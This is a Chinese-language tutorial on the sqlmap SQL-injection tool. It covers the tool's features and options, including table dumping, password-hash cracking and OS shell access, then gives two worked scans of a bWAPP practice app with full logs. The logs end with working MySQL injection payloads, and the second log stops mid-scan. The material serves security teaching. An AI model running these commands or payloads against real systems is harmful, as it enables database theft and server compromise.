sqlmap简介

sqlmap 是一个开源渗透测试工具，它可以自动检测和利用 SQL 注入漏洞来接管数据库服务器。它具有强大的检测引擎，同时有众多强大功能，包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。

sqlmap特性

• 全面支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB 和 Virtuoso数据库管理系统。

• 全面支持六种SQL注入技术:基于布尔盲、基于时间盲、基于错误、基于UNION查询、堆栈查询和带外查询。

• 通过提供DBMS凭证、IP地址、端口和数据库名称，支持不通过SQL注入直接连接到数据库。

• 支持枚举用户、密码散列、特权、角色、数据库、表和列。

• 自动识别密码哈希格式，并支持使用基于字典的攻击破解它们。

• 支持完全转储数据库表，根据用户的选择转储一系列条目或特定列。用户还可以选择从每个列的条目中只转储一定范围的字符。

• 支持搜索特定的数据库名称、跨所有数据库的特定表或跨所有数据库表的特定列。例如，这对于识别包含自定义应用程序凭据的表非常有用，其中相关列的名称包含name和pass等字符串。

• 当数据库软件是MySQL, PostgreSQL或Microsoft SQL server时，支持从数据库服务器底层文件系统下载和上传任何文件。

• 当数据库软件为MySQL, PostgreSQL或Microsoft SQL server时，支持在数据库服务器底层操作系统上执行任意命令并检索它们的标准输出。

• 支持在攻击者机器和数据库服务器底层操作系统之间建立带外有状态TCP连接。根据用户的选择，该通道可以是交互式命令提示符、Meterpreter会话或图形用户界面(VNC)会话。

• 支持通过Metasploit的Meterpreter getsystem命令升级数据库进程的用户权限。

sqlmap常用命令

目标相关参数：必须提供这些选项中的至少一个来定义目标

• -u URL, --url=URL 目标 URL (e.g. "http://www.site.com/vuln.php?id=1")

• -g GOOGLEDORK 处理谷歌dork结果作为目标url

请求相关参数：这些选项可用于指定如何连接到目标URL

• --cookie=COOKIE HTTP Cookie报头值(例如:“PHPSESSID = a8d127e…”)

• --random-agent 使用随机选择的HTTP User-Agent报头值

• --proxy=PROXY 使用代理连接到目标URL

• --tor 使用Tor匿名网络

• --check-tor 检查Tor是否被正确使用

注入相关参数：这些选项可以用来指定要测试的参数，提供定制的注入有效负载和可选的篡改脚本

• -p TESTPARAMETER 可测试的参数列表

• --dbms=DBMS 强制后端DBMS提供值

扫描相关参数：这些选项可用于定制检测阶段

• --level=LEVEL 要执行的测试级别(1-5，默认1)

• --risk=RISK 执行测试的风险(1-3，默认1)

注入技术相关参数：

• --technique=TECH.. 使用的SQL注入技术(默认为“BEUSTQ”)

枚举：这些选项可用于枚举表中包含的后端数据库管理系统信息、结构和数据

• -a, --all 检索所有

• -b, --banner 检索DBMS banner 信息

• --current-user 检索DBMS当前用户

• --current-db 检索DBMS当前数据库

• --passwords 枚举DBMS用户密码散列

• --tables 枚举DBMS数据库表

• --columns 枚举DBMS数据库表列

• --schema 枚举 DBMS 架构

• --dump Dump DBMS数据库表项

• --dump-all 转储所有DBMS数据库表项

• -D DB DBMS数据库枚举

• -T TBL DBMS数据库表枚举

• -C COL 要枚举的DBMS数据库表列

操作系统访问参数：这些选项可用于访问操作系统底层的后端数据库管理系统

• --os-shell 提示输入交互式操作系统shell

• --os-pwn 提示一个OOB shell, Meterpreter或VNC

全局相关参数：这些选项可用于设置一些通用的工作参数

• --batch 不要要求用户输入，使用默认行为

• --flush-session 刷新当前目标的会话文件

其他参数：这些选项不属于任何其他类别

• --wizard 简单的向导界面初学者

sqlmap使用案例一

说明：

1、扫描bWAPP - Login注入点，并附带cookie，其他参数不设置（默认）

2、扫描过程中会提示选择扫描的选项

3、扫描结束会打印扫描结果，如果存在注入点会打印注入类型、注入的playload

sqlmap -u"http://8.142.109.131:8080/sqli_2.php?movie=1&action=go" –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"

扫描分析过程输出：

​

$ sqlmap -u"http://8.142.109.131:8080/sqli_2.php?movie=1&action=go"  –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"_____H_____ ___[(]_____ ___ ___  {1.6.6#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org
​
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
​
[*] starting @ 11:26:54 /2022-06-17/
​
[11:26:54] [INFO] testing connection to the target URL
[11:26:54] [WARNING] potential CAPTCHA protection mechanism detected
[11:26:54] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:26:55] [INFO] testing if the target URL content is stable
[11:26:55] [INFO] target URL content is stable
[11:26:55] [INFO] testing if GET parameter 'movie' is dynamic
[11:26:55] [WARNING] GET parameter 'movie' does not appear to be dynamic
[11:26:55] [INFO] heuristic (basic) test shows that GET parameter 'movie' might be injectable (possible DBMS: 'MySQL')
[11:26:55] [INFO] heuristic (XSS) test shows that GET parameter 'movie' might be vulnerable to cross-site scripting (XSS) attacks
[11:26:55] [INFO] testing for SQL injection on GET parameter 'movie'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:28:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:28:35] [WARNING] reflective value(s) found and filtering out
[11:28:36] [INFO] GET parameter 'movie' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Cobra Commander")
[11:28:36] [INFO] testing 'Generic inline queries'
[11:28:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:28:36] [INFO] GET parameter 'movie' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[11:28:36] [INFO] testing 'MySQL inline queries'
[11:28:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:28:36] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[11:28:37] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:28:59] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[11:28:59] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[11:28:59] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:28:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:28:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:29:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:29:10] [INFO] GET parameter 'movie' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:29:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:29:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:29:10] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:29:10] [INFO] target URL appears to have 7 columns in query
[11:29:11] [INFO] GET parameter 'movie' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'movie' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[11:29:36] [INFO] testing if GET parameter 'action' is dynamic
[11:29:36] [WARNING] GET parameter 'action' does not appear to be dynamic
[11:29:36] [WARNING] heuristic (basic) test shows that GET parameter 'action' might not be injectable
[11:29:36] [INFO] testing for SQL injection on GET parameter 'action'
[11:29:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:29:37] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:29:37] [INFO] testing 'Generic inline queries'
[11:29:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:29:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:29:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[11:29:47] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:29:52] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:29:57] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:30:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:30:07] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:30:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:30:17] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[11:30:24] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[11:30:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:30:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:30:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:30:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:30:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[11:30:28] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[11:30:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:30:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:30:38] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:30:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:30:46] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[11:30:49] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[11:30:53] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:30:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:31:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:04] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:31:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:31:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:31:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:31:26] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:34] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[11:31:35] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:31:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:31:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:31:38] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[11:31:38] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[11:31:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:31:38] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[11:31:38] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[11:31:38] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[11:31:38] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[11:31:38] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:31:39] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[11:31:39] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[11:31:39] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:31:39] [INFO] testing 'MySQL inline queries'
[11:31:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:31:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:31:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:31:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:31:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:31:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:31:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:32:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[11:32:04] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[11:32:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[11:32:09] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[11:32:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[11:32:14] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[11:32:16] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[11:32:20] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[11:32:24] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[11:32:28] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[11:32:31] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[11:32:35] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[11:32:37] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[11:32:39] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[11:32:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:32:45] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:32:48] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[11:32:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[11:32:54] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:32:58] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:33:03] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:33:07] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:33:09] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:33:11] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:33:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:33:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[11:33:13] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[11:33:13] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:33:16] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[11:33:16] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[11:33:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:33:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:34:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[11:34:33] [WARNING] GET parameter 'action' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3858 HTTP(s) requests:
---
Parameter: movie (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: movie=1 AND 8304=8304&action=go
​Type: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: movie=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170717671,(SELECT (ELT(6100=6100,1))),0x7176706271,0x78))s), 8446744073709551610, 8446744073709551610)))&action=go
​Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: movie=1 AND (SELECT 6517 FROM (SELECT(SLEEP(5)))DXhM)&action=go
​Type: UNION queryTitle: Generic UNION query (NULL) - 7 columnsPayload: movie=-4573 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170717671,0x6c7642426e6e6d6c76616d6c65767367616c716f7266585344614a47594465704259774f73704c72,0x7176706271),NULL,NULL-- -&action=go
---
[11:34:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
[11:34:33] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\8.142.109.131'
​
[*] ending @ 11:34:33 /2022-06-17/

sqlmap使用案例二

说明：

1、扫描bWAPP - Login注入点，并附带cookie，指定数据库类型为mysql

2、扫描过程中会提示选择扫描的选项，合理的选择会减少扫描范围

3、扫描结束会打印扫描结果，如果存在注入点会打印注入类型、注入的playload

sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"

扫描分析过程输出：

$ sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"_____H_____ ___[']_____ ___ ___  {1.6.6#pip}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org
​
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
​
[*] starting @ 18:10:49 /2022-06-16/
​
[18:10:49] [INFO] testing connection to the target URL
[18:10:51] [WARNING] potential CAPTCHA protection mechanism detected
[18:10:51] [INFO] testing if the target URL content is stable
[18:10:51] [INFO] target URL content is stable
[18:10:51] [INFO] testing if GET parameter 'title' is dynamic
[18:10:52] [WARNING] GET parameter 'title' does not appear to be dynamic
[18:10:52] [INFO] heuristic (basic) test shows that GET parameter 'title' might be injectable (possible DBMS: 'MySQL')
[18:10:52] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting (XSS) attacks
[18:10:52] [INFO] testing for SQL injection on GET parameter 'title'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:11:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:11:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[18:11:53] [WARNING] reflective value(s) found and filtering out
[18:11:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:11:54] [INFO] testing 'Generic inline queries'
[18:11:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:11:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:12:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:12:04] [INFO] GET parameter 'title' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Z")
[18:12:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:12:04] [INFO] GET parameter 'title' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[18:12:04] [INFO] testing 'MySQL inline queries'
[18:12:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:12:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:12:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[18:12:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:12:15] [INFO] GET parameter 'title' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:12:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:12:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:12:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:12:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:12:16] [INFO] target URL appears to have 7 columns in query
[18:12:16] [INFO] GET parameter 'title' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[18:12:16] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'title' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[18:12:53] [INFO] testing if GET parameter 'action' is dynamic
[18:12:53] [WARNING] GET parameter 'action' does not appear to be dynamic
[18:12:53] [WARNING] heuristic (basic) test shows that GET parameter 'action' might not be injectable
[18:12:53] [INFO] testing for SQL injection on GET parameter 'action'
[18:12:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:12:54] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:12:54] [INFO] testing 'Generic inline queries'
[18:12:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:12:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:13:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:13:08] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:13:16] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:13:24] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:13:31] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:13:40] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:13:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[18:13:55] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[18:14:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:14:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:14:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:14:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:14:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[18:14:09] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[18:14:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:14:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:14:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:14:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:14:36] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[18:14:41] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[18:14:47] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:14:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:14:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:03] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:15:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:15:20] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:15:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:15:31] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:43] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[18:15:46] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
